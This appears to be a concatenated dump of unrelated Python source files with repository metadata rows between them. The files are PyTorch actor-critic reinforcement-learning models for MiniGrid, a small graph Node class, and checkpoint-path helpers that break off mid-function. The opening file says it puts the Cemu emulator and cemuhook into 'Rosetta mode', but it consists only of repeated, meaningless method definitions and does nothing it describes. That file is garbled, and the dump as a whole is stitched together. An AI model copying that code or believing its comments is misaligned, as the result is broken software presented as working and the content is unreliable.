## prompt the cemuhook and cemu engine to run in rosetta mode
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def RosettaMode(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def RosettaMode(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## locate the cemu directory
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
vulcan_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vulcan")
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## when running generate a dll version of this file that hooks to cemuhook
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## rename cemuhook version to "PIxel Co. Rosetta"
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def varFPS(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def EngineType(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def optimization(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def cemuhook(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def cemuhook(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## install this to cemu version
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__)) | 77.290323 | 88 | 0.721202 | 328 | 2,396 | 4.289634 | 0.146341 | 0.307036 | 0.221748 | 0.289979 | 0.780384 | 0.780384 | 0.780384 | 0.780384 | 0.780384 | 0.780384 | 0 | 0 | 0.095576 | 2,396 | 31 | 89 | 77.290323 | 0.649285 | 0.119366 | 0 | 0.84 | 0 | 0 | 0.048618 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.96 | false | 0 | 0 | 0 | 0.96 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 11 |
d456669b80b4dee20575bbf1adfdbdb22cbc5b03 | 60 | py | Python | john_doe/cities/united_states.py | xioren/JohnDoe | 4bd16f394709cac246438c8ffd650b4b301cb2b7 | [
"MIT"
] | null | null | null | john_doe/cities/united_states.py | xioren/JohnDoe | 4bd16f394709cac246438c8ffd650b4b301cb2b7 | [
"MIT"
] | null | null | null | john_doe/cities/united_states.py | xioren/JohnDoe | 4bd16f394709cac246438c8ffd650b4b301cb2b7 | [
"MIT"
] | null | null | null | from cities.us.states import *
from cities.us.zips import *
| 20 | 30 | 0.766667 | 10 | 60 | 4.6 | 0.6 | 0.434783 | 0.521739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 60 | 2 | 31 | 30 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2e7d5214ff1667239a03321d366deac1eb7cc272 | 20,993 | py | Python | trojai_rl/modelgen/architectures/minigrid_architectures.py | trojai/trojai_rl | 692f281b82c759353376a40c7a820cca3e5e7f84 | [
"Apache-2.0"
] | 3 | 2020-07-09T00:18:52.000Z | 2021-07-09T06:53:06.000Z | trojai_rl/modelgen/architectures/minigrid_architectures.py | trojai/trojai_rl | 692f281b82c759353376a40c7a820cca3e5e7f84 | [
"Apache-2.0"
] | 1 | 2021-11-09T23:10:50.000Z | 2021-11-09T23:10:50.000Z | trojai_rl/modelgen/architectures/minigrid_architectures.py | trojai/trojai_rl | 692f281b82c759353376a40c7a820cca3e5e7f84 | [
"Apache-2.0"
] | 1 | 2021-03-10T07:59:15.000Z | 2021-03-10T07:59:15.000Z | import numpy as np
import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
import torch_ac
class BasicFCModel(nn.Module):
"""
Fully connected Actor-Critic model. Set architecture that is smaller and quicker to train.
Designed for default MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space, action_space):
"""
Initialize the model.
:param obs_space: (gym.Spaces) Observation space of the environment being used for training. Used to determine
the size of the input layer.
:param action_space: (gym.Spaces) Action space of the environment being used for training. Used to determine
the size of the actor's output later.
"""
super().__init__()
self.recurrent = False # required for using torch_ac package
self.preprocess_obss = None # Default torch_ac pre-processing works for this model
# Define state embedding
self.state_emb = nn.Sequential(
nn.Linear(np.prod(obs_space.shape), 100),
nn.ReLU(),
nn.Linear(100, 64),
nn.ReLU()
)
self.state_embedding_size = 64
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.state_embedding_size, 32),
nn.ReLU(),
nn.Linear(32, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.state_embedding_size, 32),
nn.ReLU(),
nn.Linear(32, 1)
)
def forward(self, obs):
x = obs.transpose(1, 3).transpose(2, 3).reshape(obs.size()[0], -1)
x = self.state_emb(x.float())
x = x.reshape(x.shape[0], -1)
x_act = self.actor(x)
dist = Categorical(logits=F.log_softmax(x_act, dim=1))
x_crit = self.critic(x)
value = x_crit.squeeze(1)
return dist, value
class SimplifiedRLStarter(nn.Module):
"""
Modified actor-critic model from https://github.com/lcswillems/rl-starter-files/blob/master/model.py.
Simplified to be easier to understand and used for early testing.
Designed for default MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space, action_space, grayscale=False):
"""
Initialize the model.
:param obs_space: (gym.Spaces) Observation space of the environment being used for training. Used to determine
the size of the embedding layer.
:param action_space: (gym.Spaces) Action space of the environment being used for training. Used to determine
the size of the actor's output later.
:param grayscale: (bool) Merge the three state-space arrays into one using an RGB to grayscale conversion, and
set the CNN to expect 1 channel instead of 3. NOT RECOMMENDED. Shrinks the observation space, which may
speed up training, but is likely unnecessary and may have unintended consequences.
"""
super().__init__()
self.recurrent = False # required for using torch_ac package
self.grayscale = grayscale
num_channels = 1 if grayscale else 3
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(num_channels, 16, (2, 2)),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(16, 32, (2, 2)),
nn.ReLU(),
nn.Conv2d(32, 64, (2, 2)),
nn.ReLU()
)
n = obs_space.shape[0]
m = obs_space.shape[1]
self.embedding_size = ((n - 1) // 2 - 2) * ((m - 1) // 2 - 2) * 64
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.embedding_size, 64),
nn.Tanh(),
nn.Linear(64, 64),
nn.Tanh(),
nn.Linear(64, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.embedding_size, 64),
nn.Tanh(),
nn.Linear(64, 64),
nn.Tanh(),
nn.Linear(64, 1)
)
# Initialize parameters correctly
self.apply(self.init_params)
def preprocess_obss(self, obss, device=None):
if self.grayscale: # simplify state space using grayscale conversion (even though it isn't an RGB image)
if not (type(obss) is list or type(obss) is tuple):
obss = [obss]
new_obss = []
for i in range(len(obss)):
new_obss.append(cv2.cvtColor(obss[i], cv2.COLOR_RGB2GRAY))
return torch.tensor(new_obss, device=device).unsqueeze(-1)
else:
# default torch_ac preprocess_obss call
return torch.tensor(obss, device=device)
# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py
@staticmethod
def init_params(m):
classname = m.__class__.__name__
if classname.find("Linear") != -1:
m.weight.data.normal_(0, 1)
m.weight.data *= 1 / torch.sqrt(m.weight.data.pow(2).sum(1, keepdim=True))
if m.bias is not None:
m.bias.data.fill_(0)
def forward(self, obs):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
embedding = x
x = self.actor(embedding)
dist = Categorical(logits=F.log_softmax(x, dim=1))
x = self.critic(embedding)
value = x.squeeze(1)
return dist, value
class ModdedRLStarter(nn.Module, torch_ac.RecurrentACModel):
"""
Modified actor-critic model from https://github.com/lcswillems/rl-starter-files/blob/master/model.py.
Designed for default MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space, action_space, use_memory=True, layer_width=64):
"""
Initialize the model.
:param obs_space: (gym.Spaces) Observation space of the environment being used for training. Used to determine
the size of the embedding layer.
:param action_space: (gym.Spaces) Action space of the environment being used for training. Used to determine
the size of the actor's output later.
:param use_memory: (bool) Use the LSTM capability to add memory to the embedding. Required to be True if
recurrence is set to > 1 in torch_ac's PPO algorithm (via TorchACOptConfig). Mostly untested.
:param layer_width: (int) Number of nodes to put in each hidden layer used for the actor and critic.
"""
super().__init__()
# Since recurrence is optional for this model, we need to check and set this here.
if not use_memory:
self.recurrent = False
self.layer_width = layer_width
self.preprocess_obss = None # Use Default torch_ac pre-processing for this model
self.use_memory = use_memory
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(3, 16, (2, 2)),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(16, 32, (2, 2)),
nn.ReLU(),
nn.Conv2d(32, 64, (2, 2)),
nn.ReLU()
)
n = obs_space.shape[0]
m = obs_space.shape[1]
self.image_embedding_size = ((n - 1) // 2 - 2) * ((m - 1) // 2 - 2) * 64
if self.use_memory:
self.memory_rnn = nn.LSTMCell(self.image_embedding_size, self.semi_memory_size)
self.embedding_size = self.semi_memory_size
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.embedding_size, self.layer_width),
nn.Tanh(),
nn.Linear(self.layer_width, self.layer_width),
nn.Tanh(),
nn.Linear(self.layer_width, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.embedding_size, self.layer_width),
nn.Tanh(),
nn.Linear(self.layer_width, self.layer_width),
nn.Tanh(),
nn.Linear(self.layer_width, 1)
)
# Initialize parameters correctly
self.apply(self.init_params)
# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py
@staticmethod
def init_params(m):
classname = m.__class__.__name__
if classname.find("Linear") != -1:
m.weight.data.normal_(0, 1)
m.weight.data *= 1 / torch.sqrt(m.weight.data.pow(2).sum(1, keepdim=True))
if m.bias is not None:
m.bias.data.fill_(0)
@property
def memory_size(self):
return 2 * self.semi_memory_size
@property
def semi_memory_size(self):
return self.image_embedding_size
def forward(self, obs, memory):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
if self.use_memory:
hidden = (memory[:, :self.semi_memory_size], memory[:, self.semi_memory_size:])
hidden = self.memory_rnn(x, hidden)
embedding = hidden[0]
memory = torch.cat(hidden, dim=1)
else:
embedding = x
x = self.actor(embedding)
dist = Categorical(logits=F.log_softmax(x, dim=1))
x = self.critic(embedding)
value = x.squeeze(1)
return dist, value, memory
class ImageACModel(nn.Module):
"""
Simple CNN Actor-Critic model designed for MiniGrid with torch_ac. Contains pre-processing function that converts
the minigrid RGB observation to a 48x48 grayscale or RGB image.
Designed for RGB/Grayscale MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space, action_space, grayscale=False):
"""
Initialize the model.
:param obs_space: (gym.Spaces) Observation space of the environment being used for training. Technically unused
for this model, but stored both for consistency between models and to be used for later reference if needed.
:param action_space: (gym.Spaces) Action space of the environment being used for training. Used to determine
the size of the actor's output later.
:param grayscale: (bool) Convert RGB image to grayscale. Reduces the number of input channels to the first
convolution from 3 to 1.
"""
super().__init__()
self.recurrent = False # required for using torch_ac package
# technically don't need to be stored, but may be useful later.
self.obs_space = obs_space
self.action_space = action_space
self.image_size = 48 # this is the size of image this CNN was designed for
self.grayscale = grayscale
num_channels = 1 if grayscale else 3
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(num_channels, 8, (3, 3), stride=3),
nn.ReLU(),
nn.Conv2d(8, 16, (4, 4), stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, (3, 3), stride=2),
nn.ReLU()
)
self.image_embedding_size = 3 * 3 * 32
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.image_embedding_size, 144),
nn.ReLU(),
nn.Linear(144, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.image_embedding_size, 144),
nn.ReLU(),
nn.Linear(144, 1)
)
def preprocess_obss(self, obss, device=None):
if not (type(obss) is list or type(obss) is tuple):
obss = [obss]
new_obss = []
for i in range(len(obss)):
if self.grayscale:
img = cv2.resize(cv2.cvtColor(obss[i], cv2.COLOR_RGB2GRAY), (self.image_size, self.image_size))
else:
img = cv2.resize(obss[i], (self.image_size, self.image_size))
new_obss.append(img)
if self.grayscale:
return torch.tensor(new_obss, device=device).unsqueeze(-1)
else:
return torch.tensor(new_obss, device=device)
def forward(self, obs):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
x_act = self.actor(x)
dist = Categorical(logits=F.log_softmax(x_act, dim=1))
x_crit = self.critic(x)
value = x_crit.squeeze(1)
return dist, value
class GRUActorCriticModel(nn.Module, torch_ac.RecurrentACModel):
"""
Modified actor-critic model from https://github.com/lcswillems/rl-starter-files/blob/master/model.py, using a GRU
in the embedding layer. Note that this model should have the 'recurrence' argument set to 1 in the TorchACOptimizer.
Designed for default MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space,
action_space,
rnn1_hidden_shape=64,
rnn1_n_layers=2,
rnn2_hidden_shape=64,
rnn2_n_layers=2,
fc_layer_width=64):
super().__init__()
self.preprocess_obss = None # Use Default torch_ac pre-processing for this model
self.layer_width = fc_layer_width
self.rnn1_n_layers = rnn1_n_layers
self.rnn1_hidden_shape = rnn1_hidden_shape
self.rnn2_n_layers = rnn2_n_layers
self.rnn2_hidden_shape = rnn2_hidden_shape
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(3, 16, (2, 2)),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(16, 32, (2, 2)),
nn.ReLU(),
nn.Conv2d(32, 64, (2, 2)),
nn.ReLU()
)
n = obs_space.shape[0]
m = obs_space.shape[1]
self.image_embedding_size = ((n - 1) // 2 - 2) * ((m - 1) // 2 - 2) * 64
self.rnn_layer1 = nn.GRU(self.image_embedding_size, self.rnn1_hidden_shape, num_layers=self.rnn1_n_layers)
self.rnn_layer2 = nn.GRU(self.rnn1_hidden_shape, self.rnn2_hidden_shape, num_layers=self.rnn2_n_layers)
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.rnn2_hidden_shape, self.layer_width),
nn.ReLU(),
nn.Linear(self.layer_width, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.rnn2_hidden_shape, self.layer_width),
nn.ReLU(),
nn.Linear(self.layer_width, 1)
)
@property
def memory_size(self):
return self.rnn1_hidden_shape * self.rnn1_n_layers + self.rnn2_hidden_shape * self.rnn2_n_layers
def forward(self, obs, memory):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
batch_size = memory.shape[0]
# construct previous hidden states from memory
h0_1 = memory[:, :(self.rnn1_hidden_shape * self.rnn1_n_layers)]\
.reshape(batch_size, self.rnn1_n_layers, self.rnn1_hidden_shape).transpose(0, 1).contiguous()
h0_2 = memory[:, (self.rnn1_hidden_shape * self.rnn1_n_layers):]\
.reshape(batch_size, self.rnn2_n_layers, self.rnn2_hidden_shape).transpose(0, 1).contiguous()
out, hidden = self.rnn_layer1(x.unsqueeze(0), h0_1)
memory1 = hidden.transpose(0, 1).reshape(batch_size, self.rnn1_hidden_shape * self.rnn1_n_layers)
embedding, hidden = self.rnn_layer2(out, h0_2)
memory2 = hidden.transpose(0, 1).reshape(batch_size, self.rnn2_hidden_shape * self.rnn2_n_layers)
# store all memories into a memory vector that will be associated with each observation.
memory = torch.cat((memory1, memory2), dim=1)
embedding = embedding.squeeze(0)
x = self.actor(embedding)
dist = Categorical(logits=F.log_softmax(x, dim=1))
x = self.critic(embedding)
value = x.squeeze(1)
return dist, value, memory
class ImageGRUActorCriticModel(nn.Module, torch_ac.RecurrentACModel):
"""
Combination of ImageACModel and GRUActorCriticModel.
Modified actor-critic model from https://github.com/lcswillems/rl-starter-files/blob/master/model.py, using a GRU
in the embedding layer and has a modified CNN layer designed to accept 48x48 RGB or grayscale images.
Note that this model should have the 'recurrence' argument set to 1 in the TorchACOptimizer. Also contains
pre-processing function that converts the minigrid RGB observation to a 48x48 grayscale or RGB image.
Designed for RGB/Grayscale MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space,
action_space,
rnn1_hidden_shape=144,
rnn1_n_layers=2,
rnn2_hidden_shape=144,
rnn2_n_layers=2,
fc_layer_width=144,
grayscale=False):
super().__init__()
# keep track just for reference
self.obs_space = obs_space
self.action_space = action_space
self.layer_width = fc_layer_width
self.rnn1_n_layers = rnn1_n_layers
self.rnn1_hidden_shape = rnn1_hidden_shape
self.rnn2_n_layers = rnn2_n_layers
self.rnn2_hidden_shape = rnn2_hidden_shape
self.image_size = 48 # this is the size of image this CNN was designed for
self.grayscale = grayscale
num_channels = 1 if grayscale else 3
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(num_channels, 8, (3, 3), stride=3),
nn.ReLU(),
nn.Conv2d(8, 16, (4, 4), stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, (3, 3), stride=2),
nn.ReLU()
)
self.image_embedding_size = 3 * 3 * 32
self.rnn_layer1 = nn.GRU(self.image_embedding_size, self.rnn1_hidden_shape, num_layers=self.rnn1_n_layers)
self.rnn_layer2 = nn.GRU(self.rnn1_hidden_shape, self.rnn2_hidden_shape, num_layers=self.rnn2_n_layers)
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.rnn2_hidden_shape, self.layer_width),
nn.ReLU(),
nn.Linear(self.layer_width, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.rnn2_hidden_shape, self.layer_width),
nn.ReLU(),
nn.Linear(self.layer_width, 1)
)
def preprocess_obss(self, obss, device=None):
if not (type(obss) is list or type(obss) is tuple):
obss = [obss]
new_obss = []
for i in range(len(obss)):
if self.grayscale:
img = cv2.resize(cv2.cvtColor(obss[i], cv2.COLOR_RGB2GRAY), (self.image_size, self.image_size))
else:
img = cv2.resize(obss[i], (self.image_size, self.image_size))
new_obss.append(img)
if self.grayscale:
return torch.tensor(new_obss, device=device).unsqueeze(-1)
else:
return torch.tensor(new_obss, device=device)
@property
def memory_size(self):
return self.rnn1_hidden_shape * self.rnn1_n_layers + self.rnn2_hidden_shape * self.rnn2_n_layers
def forward(self, obs, memory):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
batch_size = memory.shape[0]
# construct previous hidden states from memory
h0_1 = memory[:, :(self.rnn1_hidden_shape * self.rnn1_n_layers)]\
.reshape(batch_size, self.rnn1_n_layers, self.rnn1_hidden_shape).transpose(0, 1).contiguous()
h0_2 = memory[:, (self.rnn1_hidden_shape * self.rnn1_n_layers):]\
.reshape(batch_size, self.rnn2_n_layers, self.rnn2_hidden_shape).transpose(0, 1).contiguous()
out, hidden = self.rnn_layer1(x.unsqueeze(0), h0_1)
memory1 = hidden.transpose(0, 1).reshape(batch_size, self.rnn1_hidden_shape * self.rnn1_n_layers)
embedding, hidden = self.rnn_layer2(out, h0_2)
memory2 = hidden.transpose(0, 1).reshape(batch_size, self.rnn2_hidden_shape * self.rnn2_n_layers)
# store all memories into a memory vector that will be associated with each observation.
memory = torch.cat((memory1, memory2), dim=1)
embedding = embedding.squeeze(0)
x = self.actor(embedding)
dist = Categorical(logits=F.log_softmax(x, dim=1))
x = self.critic(embedding)
value = x.squeeze(1)
return dist, value, memory
| 38.519266 | 120 | 0.612538 | 2,824 | 20,993 | 4.395892 | 0.107295 | 0.033672 | 0.025375 | 0.024488 | 0.835992 | 0.824795 | 0.8169 | 0.806106 | 0.803126 | 0.794587 | 0 | 0.031036 | 0.284762 | 20,993 | 544 | 121 | 38.590074 | 0.795738 | 0.258705 | 0 | 0.810056 | 0 | 0 | 0.000795 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058659 | false | 0 | 0.019553 | 0.011173 | 0.139665 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5ceb2b86e1ca8ad09b82f140a79188819abe57cb | 222 | py | Python | colouring/node.py | mattpaletta/coloured-graph-traversal | 15265a507cae4bf52fc582d4d4c871179e48eb32 | [
"MIT"
] | null | null | null | colouring/node.py | mattpaletta/coloured-graph-traversal | 15265a507cae4bf52fc582d4d4c871179e48eb32 | [
"MIT"
] | null | null | null | colouring/node.py | mattpaletta/coloured-graph-traversal | 15265a507cae4bf52fc582d4d4c871179e48eb32 | [
"MIT"
] | null | null | null | from colouring.colour import Colour
class Node(object):
def __init__(self, colour: Colour, id: int):
self._colour = colour
self.id = id
def get_colour(self) -> Colour:
return self._colour
| 22.2 | 48 | 0.644144 | 29 | 222 | 4.689655 | 0.482759 | 0.294118 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.261261 | 222 | 9 | 49 | 24.666667 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
cf252221d863ce568851931af3c816ed35ae95ab | 15,400 | py | Python | policy_learning/path_templates.py | UT-Austin-RPL/BUDS | 6b5ae1864b50bb6212fae4fdfba4ffc8e74f2e85 | [
"MIT"
] | 9 | 2021-10-03T06:05:32.000Z | 2022-03-14T01:25:27.000Z | policy_learning/path_templates.py | UT-Austin-RPL/BUDS | 6b5ae1864b50bb6212fae4fdfba4ffc8e74f2e85 | [
"MIT"
] | null | null | null | policy_learning/path_templates.py | UT-Austin-RPL/BUDS | 6b5ae1864b50bb6212fae4fdfba4ffc8e74f2e85 | [
"MIT"
] | 2 | 2021-10-07T02:22:59.000Z | 2021-11-05T00:31:17.000Z | from models.conf_utils import *
from easydict import EasyDict
def output_parent_dir_template(cfg):
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/"
return output_dir
def single_subskill_path_template(cfg, subtask_id, use_changepoint=False):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/task_{cfg.multitask.training_task_id}_bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
if use_changepoint:
output_dir = f"{output_dir}_changepoint"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_{cfg.skill_subgoal_cfg.subgoal_type}_subtask_{subtask_id}.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_subtask_{subtask_id}"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def subskill_path_template(cfg, subtask_id, use_changepoint=False):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
if cfg.skill_subgoal_cfg is None and cfg.skill_training.policy_type == "no_subgoal":
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.skill_training.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.agglomoration.policy_type}"
else:
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
if use_changepoint:
output_dir = f"{output_dir}_changepoint"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_{cfg.skill_subgoal_cfg.subgoal_type}_subtask_{subtask_id}.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_subtask_{subtask_id}"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def single_skill_path_template(cfg):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_single_skill.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_single"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def gti_path_template(cfg):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_gti.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_gti"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def rpl_path_template(cfg):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_rpl.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_rpl"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def vae_path_template(cfg):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
output_dir = f"results/{cfg.data.dataset_name}"
model_name = f"{output_dir}/subgoal_vae.pth"
return output_dir, model_name
def meta_path_template(cfg):
folder_path = cfg.folder
modality_str = get_modalities_str(cfg)
if cfg.skill_training.policy_type == "no_subgoal":
